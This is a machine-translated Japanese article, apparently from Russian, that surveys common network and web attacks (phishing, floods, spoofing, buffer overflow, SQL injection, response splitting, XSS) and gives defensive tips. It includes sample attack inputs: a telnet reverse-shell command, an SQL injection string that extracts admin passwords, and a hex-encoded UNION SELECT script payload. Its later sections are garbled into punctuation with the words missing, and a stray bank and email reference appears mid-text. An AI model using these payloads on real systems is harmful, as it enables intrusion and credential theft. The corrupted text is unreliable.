📀 👩🏼‍🚀 🔳 一般的なセキュリティの脅威 🤞🏼 🧖🏽 👫

おそらく誰もが、セキュリティを脅かすさまざまな方法があることを知っています。彼らは本当に十分です、あなたがカットの下で読んだ後にどれくらいの数を見つけるでしょうか。

以下で使用されるすべてのリンクは、どこか間違った場所につながる場合の例として使用されます。

この記事は、 forxakep.ucoz.ru / publ / 3-1-0-16からも入手できます。

forum.netall.ru/index.php?showtopic=125182&st=0&p=1573116&#entry1573116

www.inattack.ru/article/402.html

釣り（またはフィッシング）。

非常に広い概念。その意味は、ユーザー（パスワード、クレジットカード番号など）またはお金から情報を取得することです。この手法は、1人のユーザーではなく、多くのユーザーを対象としています。たとえば、技術サポートからの手紙が銀行のすべての既知の顧客に送信されます。通常、手紙には、技術的な作業のために、アカウントにパスワードを送信するリクエストが含まれています。従業員は誰もそのような情報を要求することはできず、この情報を開示すべきではないとユーザーに警告されているにもかかわらず、番号やパスワードなどを「与える」ことに満足している人は常にいます。そのような手紙は通常非常に信じられており、構成がよく、だまされやすいユーザーを買収する可能性があります。フィッシングには、文字に加えていくつかの方法があることに注意してください。以下の手法の一部は、正しく使用された場合、フィッシングに適しています（原則として、手法の説明でこれを言及しています）。

推奨事項：パラノイアが最良の防御であることを忘れないでください。疑わしいものを信頼しないでください。データを誰とも共有しないでください。パスワードがサーバーにアクセスするように設計されている場合、管理者はパスワードを知る必要はありません。サーバーを完全に制御し、パスワード自体を確認したり、変更したりできます。

ソーシャルエンジニアリング

技術的ではなく、心理的なテクニックです。インベントリ中に取得したデータを使用して、クラッカーは管理者に代わって一部のユーザー（企業ネットワークなど）に電話をかけ、パスワードなどを見つけようとします。これは、大規模なネットワークでユーザーがすべての従業員を把握していない場合に可能になり、さらには、電話で常に正確に認識できない場合もあります。さらに、複雑な心理的手法が使用されるため、成功の可能性が大幅に高まります。

推奨事項：同じ。本当に必要がある場合は、必要なデータを直接提供してください。パスワードを紙に書き留めた場合は、パスワードをどこにも残さないで、可能であれば破棄し、ゴミ箱に捨てるだけではありません。

ウイルス。

最も単純なユーザーの問題に知られています。一番下の行は、ユーザーのコンピューターへのマルウェアの導入です。結果は異なる場合があり、コンピューターが感染しているウイルスの種類によって異なります。しかし、一般的には-情報の盗用からスパムの送信、DDoS攻撃の組織化、コンピューターの完全な制御の取得まで。レターに添付されたファイルに加えて、ウイルスはOSの脆弱性を介してコンピューターに侵入する可能性があります。これについては、記事「Windows Vulnerability Rating」で説明しています。多くのウイルスがありますが、それらを分類することはまだ可能です。車輪を再発明したくないので、このページschool8.uriit.ru/people/av/class.htmlの情報を使用して、説明付きのウイルスの分類を示します。このトピックの詳細については、 fivt.krgtu.ru / kafedri / mo / site / ANTIVIRUS / pages / 02.htmをご覧ください。

推奨事項：ウイルス対策ソフトウェアを使用します。 DrWEBまたはKaspersky Anti-Virus（レジストリをチェックしないため）のみに限定せず、Ad-Aware、SpyBot、XSpyなどのマルウェアに対する特別なウイルス対策を使用してください。また、疑わしい添付ファイルを開いたり、未知の送信者からのプログラムを開いたりしないでください。送信者がよく知っていても、最初にウイルス対策をチェックしてください。ここでは、医学のように、後で治すよりも避けるほうが簡単です。

DoS（サービス拒否またはサービス拒否）。

これは別の攻撃ではなく、攻撃の結果であると言いたかったのです。システムまたは個々のプログラムを無効にするために使用されます。これを行うために、クラッカーは特別な方法でプログラムへのリクエストを作成し、その後機能を停止します。プログラムを動作状態に戻すには、再起動が必要です。 DoSはFloodタイプの攻撃と同じであり、一般に、DoSという一般名でシステムの障害につながるすべての攻撃を組み合わせる必要があると考えられています。それに言及する価値があります：

-一般的な用語はなく、攻撃を分類するためのかなり暗黙のルールがあります。そのため、この記事のフレームワーク内でも、ある程度一般的な分類を行います。

-既に述べたように、Floodだけでなく、たとえば、Buffer Overflowは、サービス拒否につながる可能性があります。

したがって、DoSは攻撃の結果として説明できます。例：「サービス拒否の影響は、フラッド攻撃を使用して達成されます。」

洪水（洪水または河川/洪水）

このタイプはかなり議論の余地があり、一部はDoSに起因する可能性がありますが、別途強調したいと思います。多くのマシンから（この場合、攻撃はDDoS分散サービス拒否攻撃と呼ばれます。分散サービス拒否攻撃と呼ばれます）、原則として、ゾンビは被害者に可能な限り最大数の要求（接続要求など）を送信します。このことから、被害者は各リクエストに応答する時間がなく、その結果、ユーザーのリクエストに応答しません。正常に機能しなくなったと言えます。注：このタイプの攻撃は、たとえばフォーラムが無意味なメッセージでいっぱいになっている場合、フーリガン主義と呼ばれます。次のFloodタイプを区別できます。

--SYN Flood-攻撃されたコンピューターをSYNパケットでフラッディングします。ご存じのように、コンピュータはそのようなパケットにSYN / ACKタイプのパケットで応答する必要があります。 SYNパケットが多すぎる場合、コンピューターはそれぞれに応答する時間がなく、他のコンピューターからパケットを受信できません。

--ICMP FloodまたはPing Flood-同じこと、ICMPパケットのみ。システムはそのようなパケットに応答する必要があります。これにより、チャネルのパフォーマンス（帯域幅）を低下させる多数のパケットが作成されます。

--Identification Flood（Ident Flood）。 ICMP Floodに似ていますが、タイプidentdのポート113に対する要求への応答にはシステムからの時間がかかるため、攻撃はより効果的です。

--DNS Flood-攻撃はDNSサーバーに向けられます。サーバーには応答する時間がないDNSクエリが殺到しているため、クエリにも応答できません。その結果、インターネットサイトにアクセスできなくなります。

--DDoS DNS-攻撃はまったく新しいものであり、「定評のある」名前を満たしていませんでした。実際、この手法は以前の手法とほぼ同じですが、唯一の違いは、リクエストが多数のマシンから送信されることです（以前のタイプはこれを除外しません）。 DNSサーバーがこれらの要求に応答するアドレスは、DNSサーバー自体のアドレスと同じです。彼はDNSクエリであふれているだけでなく、彼自身にもそれらを送信します。したがって、受信は前の受信よりも効果的ですが、実装するのもより困難です。

--Boink（Bonk、Teardrop）-非常に断片化された膨大な数のパケットが被害者に送信されますが、断片は大きくなります。断片化されたパケットごとに、後で他のフラグメントを配置できるように、後で他のフラグメントが配置される特別なバッファが割り当てられます。膨大な数の大きなフラグメントがバッファをオーバーフローし、フリーズまたはクラッシュを引き起こす可能性があります。

--Pongは上記の他のタイプと同じですが、唯一の違いは送信者アドレスが偽物であることです。これにより、クラッカーに匿名性が与えられます。

推奨事項：OSまたはルーターごと。それらは通常、技術文書に記載されています。それらを無視しないでください。有効なパケットの数を明確に制限してください。残念ながら、一部の種は物理的な切断以外には反映できません。適切に構成されたファイアウォール（またはファイアウォール）は、多くの場合、万能薬です。

Smurf（TCP-IPプロトコルの実装エラーを狙った攻撃）

現在、このタイプの攻撃はエキゾチックと見なされていますが、以前は、TCP-IPプロトコルがかなり新しいものであったため、たとえばIPアドレスを置き換えることができる多くのエラーが含まれていました。ただし、このタイプの攻撃は引き続き適用されます。一部の専門家は、TCP Smurf、UDP Smurf、ICMP Smurfを指摘しています。もちろん、この区分はパッケージのタイプに基づいています。

推奨事項：CISCOスイッチは、他の多くの製品と同様に、新しいソフトウェアとファイアウォールだけでなく、優れた保護を提供します。ブロードキャスト要求をブロックする必要があります。

Ping-of-Death（またはJolt、SSPing）

攻撃は、フラグメント化されたICMPパケットが被害者に送信されるが、フラグメントサイズが非常に大きい（64kB）ということです。 Windows 95などの古いバージョンのOSがハングします。この攻撃は、シャドウセキュリティスキャナーを使用して実行できます。

推奨事項：OSを更新し、古いバージョンを放棄するのが最も簡単です。

UDPストーム（UDPストーム）

被害者で少なくとも2つのUDPポートが開いており、それぞれが送信者に応答を送信する場合に使用されます。たとえば、タイムサーバーのあるポート37は、現在の日付と時刻を要求に送信します。クラッカーは、被害者のポートの1つにUDPパケットを送信しますが、送信者は被害者のアドレスと被害者の2番目に開いているUDPポートを示します。その後、ポートは互いに無限に応答し始め、パフォーマンスが低下します。ストームは、パケットの1つが消えるとすぐに停止します（たとえば、リソースの過負荷のため）。

推奨事項：可能であれば、UDPパケットを受け入れるサービスの使用を除外するか、ファイアウォールを使用して外部ネットワークから切断します。

UDPボム

クラッカーは、不正なサービスデータフィールドを含むUDPパケットをUDPシステムに送信します。必要に応じてデータに違反する可能性があります（たとえば、フィールド長、構造が正しくない）。これにより、クラッシュする可能性があります。

推奨事項：ソフトウェアを更新します。

土地

パケットは特定のポートで被害者に送信されますが、送信者のアドレスは被害者と同じアドレスに設定され、送信者のポートは受信者のポートと等しくなります。（例：受信者：1.1.1.1ポート111送信者：1.1.1.1ポート111）。被害者は自分との接続を確立しようとしているため、システムがハングする可能性があります。同様の攻撃は、一部のルーターに対しても100％効果的です。

メール爆撃

攻撃されたコンピューターにメールサーバーがある場合、それを無効にするために膨大な数のメールメッセージが送信されます。一方で、これはFloodを連想させますが、一方で、サーバーのウイルス対策ソフトウェアによってスキャンされる大きな添付ファイルがメッセージに含まれている場合、このような多数の着信添付ファイルのスキャンは、パフォーマンスを大幅に低下させるか、または何も減らすことができません。さらに、そのようなメッセージはサーバーのハードディスクに保存され、オーバーフローする可能性があり、DoSを引き起こす可能性があります。もちろん、今ではこの攻撃は単なる物語に過ぎませんが、場合によっては依然として使用できます。

推奨事項：メールサーバーの適切な構成。

スニッフィング

ネットワーク内のスイッチの代わりにハブがインストールされている場合、受信したパケットはネットワーク上のすべてのコンピューターに送信され、コンピューターはそれらのパッケージを決定します。クラッカーがそのようなネットワークに含まれるコンピューターにアクセスするか、ネットワークに直接アクセスすると、パスワードを含むネットワークセグメントの再配布で送信されるすべての情報が利用可能になります。攻撃者は単にネットワークカードをリスニングモードにし、意図されているかどうかに関係なくすべてのパケットを受け入れます。 TcpDump（ビルトイン* NIXシステム）、WinDump（Windows、ビルトインではない）などのコンソールスニファーとして使用できるだけでなく、Irisなどの視覚化されたインターフェイスでも使用できます。

推奨事項：ハブの代わりにスイッチを使用し、トラフィックを暗号化します。

IPハイジャック

ネットワークへの物理的なアクセスがある場合、クラッカーはネットワークケーブルに「クラッシュ」し、パケットの送信の仲介者として動作するため、2台のコンピューター間のすべてのトラフィックをリッスンします。他のメソッドを実装できない場合を除いて、しばしばそれ自体を正当化しない非常に不便なメソッド。このような組み込み自体は不便ですが、このタスクを少し簡素化するデバイスがありますが、特に、障害やチャネルへの侵入の検出を回避するためにパケットの番号付けを監視します。この方法はATMをだますために使用されますが、銀行とATM間の接続は受け入れられないため、このケースは技術的に難しく、チャネルを中断せずに「突入」するのは高度な資格を持つ専門家のみです。さらに、ATMのインストールが大幅に改善され、ケーブルへの物理的なアクセスが無料になる可能性がなくなりました。

推奨事項：ボックスへのアクセスなど、ケーブルへのアクセスに注意してください。トラフィックを暗号化します。

ダミーARP（False ARP）

ARPサーバー、ルーター、またはスイッチは、MACアドレス（ネットワークカードなど）に属するIPを認識しています。ネットワークへの物理的なアクセスが可能な場合、攻撃者はARP応答を偽装し、IPを受け取ってネットワーク上の別のコンピューターになりすますことができます。したがって、そのコンピューター宛てのすべてのパケットは彼によって受信されます。これは、そのコンピューターがオフになっている場合に可能です。そうしないと、このアクションによりIPアドレスの競合が発生します（同じネットワーク上に同じIPアドレスを持つコンピューターが2台存在することはできません）。

推奨事項：IPのMACアドレスの変更について通知するソフトウェアを使用し、ARPサーバーのログファイルを監視します。

ダミーDNSサーバー（偽のDNSサーバー）

ネットワーク設定が自動モードに設定されている場合、ネットワークに接続すると、コンピューターはDNSサーバーになる「要求」（つまり、ブロードキャストパケットを送信）します。DNSサーバーは後でDNSクエリを送信します。ネットワークへの物理アクセスがある場合、クラッカーはそのようなブロードキャスト要求を傍受し、自分のコンピューターがDNSサーバーになることを応答できます。その後、彼はだまされた被害者を任意のルートに沿って送ることができます。たとえば、被害者が銀行のウェブサイトにアクセスしてお金を送金したい場合、クラッカーはそれを自分のコンピューターに送信し、そこでパスワード入力フォームが作成されます。その後、パスワードはクラッカーに属します。攻撃者はDNSサーバーよりも早く被害者に対応する必要があるため、これはかなり複雑な方法です。

推奨事項：可能であれば、見知らぬ人のネットワークへのアクセスを制限します。

ファジー

UDPなどの特定のタイプのパケットをブロックするようにフィルターを構成できます。攻撃者は、このUDPパケットがフィルタリングしないことをフィルターが理解しないようにパケットを作成し、宛先に到達することができます。このようにして、攻撃者はパケットフィルタをバイパスできます。この手法は非常に狭く、特別な場合、より正確には接続が双方向である必要がない場合を対象としています。ほとんどの場合、双方向通信は不可能です。なぜなら、基本的に、特定のタイプの着信パケットがポートでブロックされると、発信パケットがブロックされます。製造されたパケットがフィルターを通過した場合でも（たとえば、UDPポートに）、サーバーは同じタイプのパケットで応答します。 UDP、しかし同時に彼はクラッカーの例に従ってそれを製造しません。 T.O. この発信パケットは除外され、クラッカーに到達しません。とにかく、この種の攻撃から身を守る価値はまだあります。

推奨事項：通常、新しいバージョンのファイアウォールは、この手法に対する十分な保護を提供します。

プケ

クラッカーはICMP到達不能応答（リモートシステムエラー）を作成します。これにより、クライアントはサーバーから切断されます。攻撃のためにクライアントをサーバーから切断する必要がある場合、補助ツールとして使用される可能性が高くなります。

偽の到達不能-クラッカーはパッケージを配信できない（到達不能）というメッセージを作成するため、サーバーはクライアントに障害があり、パッケージが意図したとおりに配信されていないと判断します。これにより、サーバーがクライアントを切断する場合があります。また、No。17と同様の補助ツールは、クライアントではなくサーバーに向けられています。

IPスプーフィング（スプーフィングまたはIP置換）

攻撃者は自分の実際のIPを架空のIPに置き換えます。これは、特定のIPアドレスのみがリソースにアクセスできる場合に必要です。攻撃者は、アクセスするために実際のIPを「特権」または「信頼」に変更する必要があります。この方法は異なる方法で使用できます。 2台のコンピューターがパスワードを確認して相互の接続を確立した後、クラッカーは被害者に特別に生成されたパケットでネットワークリソースを過負荷にする可能性があります。したがって、彼はトラフィックを自分自身にリダイレクトして、認証手順をバイパスできます。

推奨事項：多くの手法があるため、それらの多くが存在する可能性があります。ただし、SYNおよびACKフラグを設定して応答パケット時間を短縮し、キューで接続を確立するSYNリクエストの最大数を増やす（tcp_max_backlog）ことで、脅威が軽減される（ただし、正当な接続では困難になる可能性がある）ことに注意してください。 SYN-Cookieを使用することもできます。

ホストのなりすまし。ネットワークへの物理アクセスを必要とする非常に高度な手法。各コンピューターは、すべてのパケットを送信するルーターを認識しています。すべてのパケットは、ルーターによって宛先に配信されます。ルーターが変更されると、リダイレクト通知が各コンピューターに送信され、その後コンピューターは新しいルーターにパケットを送信し始めます。攻撃者はこのような通知を作成し、ルーターを偽装して、ネットワークセグメント内のトラフィックを制御できるようにします。

推奨事項：ネットワークアクセスとルーターが変更された瞬間を制御します。たとえば、過去のすべてのトラフィック（つまり、古い接続）が新しいルーターに「表示」されているかどうかを監視できます。

パスワード推測。

アカウントのパスワードを選択してシステムに登録するために使用されます。 2つのタイプがあります：文字のすべての可能な組み合わせの選択（BruteForce）および辞書による選択。最初の方法はより効果的です、なぜならキーボードからパスワードとして入力した文字の組み合わせはまだありますが、この方法は、特に句読点を考慮した場合など、非常に遅くなります。 2番目の方法は簡単ですが、たとえば「My-New-Password」などの辞書にない単語を入力した場合、辞書から選択することはできません。パスワードを選択するのに役立つプログラムはたくさんあるので、特定の名前を付けるのは理にかなっていないと思います。原則として、プログラム、OSなどは暗号化された形式でパスワードを保存するため、攻撃者がファイルにアクセスしたとしても、パスワードを解読する必要があります。彼はこれを自宅のコンピューターで数日間行うことができます。

推奨事項：複雑なパスワードを使用し、できれば句読点を使用してください。パスワードの試行回数を制限します。パスワードの復号化に対しては、その複雑さのみが役立ちます。

バックコネクト/パイプ/リバース

これは補助的な手法ですが、それ自体が非常に興味深いものです。たとえば、攻撃者は毎回1つのコマンドのために多くのアクションを実行することを望みません。彼はこの手法を使用してタスクを簡素化できます。その本質は、クラッカーが攻撃されたコンピューターをクラッカーのコンピューターに強制的に接続させることです。たとえば、攻撃されたコンピューターでは、telnet [ip.addresser] [port]コマンドを実行できます。この後、クラッカーは実際、攻撃されたコンピューターでコマンドライン（コマンドシェルまたはシェル/シェル）を受け取ります。

ソフトウェアの脆弱性

ソフトウェアのバグを使用する。効果は異なる場合があります。重要ではない情報の受信から、システムを完全に制御するまで。ソフトウェアのバグによる攻撃は、常に最も人気があります。古いバグは新しいバージョンで修正されますが、新しいバグは再び使用できる新しいバグをもたらします。さらに、攻撃の種類ではなく、ソフトウェアエラーを攻撃する方法について説明します。推奨事項：推奨事項は一般的なものであるため、すぐにすべての人に提供します。「安全に」書かれたプログラムコードのみが役立ちます。このトピックでは、インターネット上で大量の資料を見つけることができます。

バッファオーバーフロー

非常に危険なタイプの攻撃は、リクエストが割り当てられたメモリフレームをオーバーフローさせるような方法でリクエストが形成され、リクエスト内の「縫製」コマンドがスタックに到着し、プロセッサによって実行される場合です。クラッカーが攻撃されたコンピューターでプログラムを実行できる場合、これはリモートとローカルの両方で実行できます。これは、コンピューターでコードを実行するためと、権限を上げるための両方に使用できます。バッファオーバーフロー攻撃にはいくつかのサブタイプがあります。それぞれについては説明しません。なぜなら、原則を説明するために、プログラミングに不慣れな人々には理解できないコードの例を提供する必要があります。以下の分類は、Andrey Kolishchak（andr [at] sandy.ru）に属し、彼の記事「Attacks on buffer overflow」にあります。そのため、この記事でその説明、例、推奨事項を直接見つけることができます。審査のためだけに提供します。

---「スタック障害」を攻撃する

---パラメータ化による「スタック障害」の攻撃

---制御の移動による「スタック障害」の攻撃

---関数ポインタの歪み

---関数ポインタへの攻撃

---パラメータ化による関数ポインタへの攻撃

---コントロール転送による関数ポインターへの攻撃

---遷移表の歪み

---変換テーブルに対する攻撃

---パラメータ化による遷移テーブルへの攻撃

---コントロール転送による遷移テーブルへの攻撃

---データポインターの歪み

---データポインターディストーション攻撃

---パラメーター化によるデータポインターの歪みを伴う攻撃

---元のコードでのデータポインターの歪みによる攻撃。

上記の分類にもう1つのタイプ、整数オーバーフロー（整数オーバーフロー）を追加したいと思います。詳細については、Bleximの記事「整数オーバーフロー：攻撃」および「整数オーバーフロー：保護」または「基本整数オーバーフロー」を参照してください。

粉砕

ローカルでのみ使用可能なWindowsシステムの脆弱性。これはバッファオーバーフローと非常によく似ていますが、同じ結果になります。クラッカーコマンドがスタックにヒットします。これは、入力フィールドを持つWindowsのすべてのウィンドウが入力値の最大長を持っているという事実に基づいています。プログラム開発の段階でインストールされます。小さなフィールドの場合、たとえば50文字です。キーボードから50文字を超える文字数を入力することはできませんが、Windowsウィンドウの操作はメッセージに基づいています。ヘッダー（ヘッダーまたはヘッダー（特別、OS専用））入力フィールドを簡単に取得し、入力フィールドに（このヘッダーを使用して）SETTEXT（テキスト設定）メッセージを送信できます。メッセージには、それぞれ50文字以上のテキストをインストールする必要があることを示す必要があります。50文字目以降に発生するすべての処理はスタックに移動し、プロセッサによって実行されます。これに対する保護はありません。唯一の万能薬は、AMD Athlon 64プロセッサです。これらのプロセッサには保護機能が組み込まれており、スタックからコマンドを実行しません。

Nuke（WinNukeまたはNuke）

今、これは物語の詳細です。 Windowsは、デフォルトでNetBIOSプロトコルを使用して、ネットワーク上のファイルとプリンターを共有します。これを行うために、OSは3つのTCPポート（137、138、139）を開きます。古いバージョンのWindowsでのこのプロトコルの実装には脆弱性が含まれていました。一番下の行は、ポート139を開くために複数のOutOfBand "メッセージ"を連続して送信できることです。システムはそのようなデータを正しく処理できず、システムがハングしました。そのような攻撃のための多くのプログラムが作成されていますが、SSPingのツールとしてすでに名前を付けたShadow Security Scannerについてのみ言及します。

クロスユーザー攻撃

私たちの意見では、かなりあいまいな名前、なぜなら最善の方法は攻撃の本質を反映しているわけではありませんが、それでもこの有名な名前を守ります。 Squid 2.4およびISA / 2000では、ユーザーはサーバーとTCP接続を共有できます。 HRS（後述）を使用すると、サーバーから2つの応答を引き起こし、そのうちの1つはクラッカーによって制御され、ユーザーが受信した情報を改ざんすることができます。

CGIに対する攻撃。ほとんどのWWW（Web）サーバーは、スクリプトを使用してユーザーに追加のサービスを提供したり、追加の機能を提供したりします。たとえば、mail.ruなどのメールサーバー多くのサーバーには、「自己作成」CMS（コンテンツ管理システムまたはコンテンツ管理システム（サイト））があります。プログラマーは、ユーザーが入力した値をチェックするように常にスクリプトを強制するわけではありません。これにより、そのような見落としをさまざまな目的に使用することができます。バッファオーバーフロー攻撃は、CGIスクリプトエラーを介して実行することもできます。例： http：// host / cgi-bin / helloworld？Type = A * 100 （つまり、文字Aは100回になります）。優れた記事はhttp://www.opennet.ru/base/sec/linux_sec_guide.txt.htmlにあります。2番目の部分では、CGIプログラマーによって通常無視されるセキュリティ問題について説明しています。多くはハッキング方法ではありませんが、ハッキングに役立つだけなので、良いコードを書くためには記事を読むことをお勧めします。この記事の範囲では、安全なコードを書くというトピックを掘り下げることはできません。そのため、少なくとも、受信したデータからすべてのサービス文字をフィルターする必要があるとのみ言います。

SQLインジェクション

ユーザーが入力したデータが検証なしで生成されたSQLクエリで使用される場合、クラッカーはデータを入力してSQLデータベースから情報を取得できます。例：「SELECTログイン、email = '$ email'のメンバーからのパスワードFROM;」というリクエストがあります。$メールがユーザーによってテーブルに入力されると、リクエストが処理され、結果がページに表示されます。攻撃者はデータを変更し、「my@mail.ru 'OR login LIKE'％admin％」というフォームに入力できます。したがって、生成されるSQLクエリは次のようになります。「SELECT login、password FROM members where email='my@mail.ru 'OR login LIKE'％admin％ ';」。したがって、クラッカーはadminを含むログインを持つユーザーからパスワードを受け取ります。

HRS（HTTPリソース分割）

かなり若く、私たちの意見では複雑なトリックです（XSSにのみ使用しない場合）。これにより、ハイジャックページ、クロスユーザー改ざん、Webキャッシュポイズニング、ブラウザーキャッシュポイズニング、XSSなどの攻撃を実装できます（以下で説明します）。攻撃の本質は、特別に準備されたHTTPリクエストを使用する攻撃者が、HRSに対して脆弱なWebサーバーに、2つの個別のHTTPレスポンス（通常の状況では1つではない）で犠牲者（攻撃者ではなく）に応答させることです。 HTTP , ! , , . - , - (, - ). しかし！ HTTP ( ) HTTP ( )! , , «» - , ( ). , , , , , cookie . , HRS, , HRS.

Cross User Defacement

«» , , – . – . , HRS. , IP , -, «» . .

Web Cache Poisoning

, , . , , , , -. , . , , .

Browser Cache Poisoning. , . , Web Cache Poisoning, , .

Hijacking Pages

, «» , -, , -, . , , . . , TCP ( «»), TCP («») TCP - («»). スキームは次のとおりです。

--- «» ( «») , - «» «1» «2» ( HRS).

--- «» «» -.

---- «1» «2» «».

— , «1» «» «».

--- «» «». «», .

--- «» - «», «2» -.

--- «» «2» «».

— «2» «».

— - «» «».

--- «2» - «», «» «2».

— «» «». T.O. , , .

, , . , , , . , , , , .

CSS/XSS (Cross-Site Scripting )

, Microsoft , Java Script . , Java , «» , . , . , cookie . , . , cookie ! : «», snf.jpg, document.cookie . , , , (, ), «» cookie, . , , ( , JPG) . , (: «photo.jpg») JAVA . XSS, , Java Script . , .

SiXSS (SQL Injection Cross Site Scripting)

SQL Injection XSS, .. XSS SQL Injection. , MySQL ( 0) . , SQL , «» «3C7363726970743E616C6572742822536958535322293B3C2F7363726970743E». SQL Injection , : www.victim.com/vuln_script.php ? vuln_variable=1+union+select+0x3C7363726970743E616C6572742822536958535322293B3C2

F7363726970743E , vuln_variable vuln_script , . SiXSS, , . , . , . XSS , . , , «» , , « ». , , , SQL , «UNION», : , . , %F1%F1%FB%EB%EA%E0 , . , , . , , , SQL . , , , JAVA. . , , «» «Apex Bank PLC», apexbnkplcc@yahoo.co.uk , , . !

SiHRS（SQLインジェクションHTTPリソース分割）

レセプションは、SQLインジェクションに対するスクリプトの脆弱性を介してHTTPリソース分割を実装します。これは、たとえばインデックスによるスクリプトが、最初にHTTPアドレスのSQLデータベースにアクセスし、次にHTTP要求を生成し、SQLデータベースから受信したHTTPアドレスを使用して「Location：」フィールドのHTTP要求を置き換える場合に可能になります。これは、サイトのインターネットディレクトリでよく使用されます。SiHRSに16進数で使用できるHTTPヘッダーの例を挙げることができます。

HEXコードを選択（ 'i.php'

Content-Length：0

HTTP / 1.1 200 OK

Content-Ty

一般的なセキュリティの脅威

More articles: